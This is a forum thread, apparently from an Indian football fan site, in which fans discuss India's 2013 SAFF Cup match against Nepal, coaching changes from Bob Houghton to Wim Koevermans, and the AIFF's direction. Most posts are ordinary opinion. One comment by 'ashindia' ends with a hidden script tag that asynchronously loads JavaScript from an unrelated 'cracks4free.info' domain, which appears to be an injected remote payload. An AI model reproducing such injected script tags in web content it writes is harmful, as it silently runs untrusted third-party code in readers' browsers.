India vs Nepal Live Discussions, September 5 2013

Comments

• ArsenalFan700ArsenalFan700 Reddit13655 Points
    harry191 wrote: »
    <p>on more question rudra or gaffer or arsenalkid or namewithheld.. can you explian why is the AIFF trying to have coal toal (long ball style ) with the u-19 kids and wim (passing style) to the seniors. </p>
    <p>shouldn the juniors and seniors playuing style compiment each other.  i think arthur pappas was the right man for the blue cubs </p>

<br><div><br></div><div>I can't answer but the name is now fan. (Appreciate being mentioned though :) )</div><div><br></div><div>Anyway, I am sure @gaffertape can provide an answer for that as it seems he has more information from within the AIFF than any of us here on IFN.</div>
  • AkoiAkoi 2 Points
    <p>@ Rudra....<em>Bob's  miracle was in a muddy and slushy pitch, lie we get all the results in water logged pitches...these just give us false expectations</em></p><p><em></em> </p><p>Ru kidding me?   Nehru cup started in 2007 and ambedkar stadium was never ever muddy or water logged. Bob won with his confidence. He was the one to motivate players not to play defensive bit attacking game etc etc. If you dont know pls dont write rubbish here. </p>
  • harry191 wrote: »
    <p>on more question rudra or gaffer or arsenalkid or namewithheld.. can you explian why is the AIFF trying to have coal toal (long ball style ) with the u-19 kids and wim (passing style) to the seniors. </p>
    <p>shouldn the juniors and seniors playuing style compiment each other.  i think arthur pappas was the right man for the blue cubs </p>

<br><div><br></div><div>I can't answer but the name is now fan. (Appreciate being mentioned though :) )</div><div><br></div><div>Anyway, I am sure @gaffertape can provide an answer for that as it seems he has more information from within the AIFF than any of us here on IFN.</div>

<br/> :D
  • rudrarudra 2958 Points
    Akoi wrote: »
    <p>@ Rudra....<em>Bob's  miracle was in a muddy and slushy pitch, lie we get all the results in water logged pitches...these just give us false expectations</em></p><p><em></em> </p><p>Ru kidding me?   Nehru cup started in 2007 and ambedkar stadium was never ever muddy or water logged. Bob won with his confidence. He was the one to motivate players not to play defensive bit attacking game etc etc. If you dont know pls dont write rubbish here. </p>

<br><div><br></div><div>Bob's miracle = AFC CC win</div>
  • ashindiaashindia 9254 Points
    rudra wrote: »
    <br><div><br></div><div>Bob's miracle = AFC CC win</div>

<br><br>I watched all of India's game till the semi-final from the stands, but seriously they were not shit like what we are now. This is all time low.......... IMG Jokers + AIFF jokers + Dumb coach + Shit Players = Result in this SAFF Cup<br>
  • I agree that Bob's success mostly came playing in a slushy pitch and in home ground but just want to mention his last tournament which was AFC challenge cup qualifier which was may be India's last victory in foreign soil. Could'not watch that tournament as there was not a telecast but from the result I believe the disciplined football was there. The important thing is we were heading towards a direction when Bob was here which is totally missing now. May be this is the most confused state of Indian football ever with I leage vs IMG or Chit fund sponsorship - every thing is going against the football.However I am not taking side of Bob or Wim or anybody. I am just frustrated with the tempo of these batches. No leadership at all. They are doing basic mistakes. Even against Australia, South Koria our guys could trap or head the ball properly. What a NT coach will do if his players dont do the basic properly?  
  • ashindiaashindia 9254 Points
    People are saying our defence is good but remember these are worst teams in the world they can barely score goals against higher ranked teams. Match against Pakistan is good example lucky that their finishing is crap or else we would got destroyed 7-0 or 5-0 if it was Jordan or something.<script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>
  • AkoiAkoi 2 Points
    Now i hope people dont point me out for say Nehru cup started in 2007...what i meant was under Bob it started in 2007.
  • shibiershibier 2996 Points
    edited September 2013
    I have  got a chance to watch India Vs Qatar friendly match from the stands in 2011 Doha. This same team , only two three guys missing, completely dominated Qatar in that match. Armando Colaco was the coach tht time. What a beautiful game it was one to one small passes. India kept the possession most of the time and Qatar team were  literally running behind the ball. In the second half Qatar team played with their full team with foriegn strickers like Sebastian soria, Fabio etc. Cant digest that the same team now struggling against SAFF countries with in a span of two years !!. I think tht was the last time i saw Indian football played up to their potential. After tht even if we won Nehru cup we have not seen any quality games from Team India. 
  • AkoiAkoi 2 Points
    <p>I<em> have got a chance to watch India Vs Qatar friendly match from the stands in 2011 Doha. This same team , only two three guys missing, completely dominated Qatar in that match. Armando Colaco was the coach tht time. What a beautiful game it was one to one small passes. India kept the possession most of the time and Qatar team were literally running behind the ball. In the second half Qatar team played with their full team with foriegn strickers like Sebastian soria, Fabio etc. Cant digest that the same team now struggling against SAFF countries with in a span of two years !!. I think tht was the last time i saw Indian football played up to their potential. After tht even if we won Nehru cup we have not seen any quality games from Team India.</em></p><p><em></em> </p><p>Whome to blame....isnt coach responsible?</p>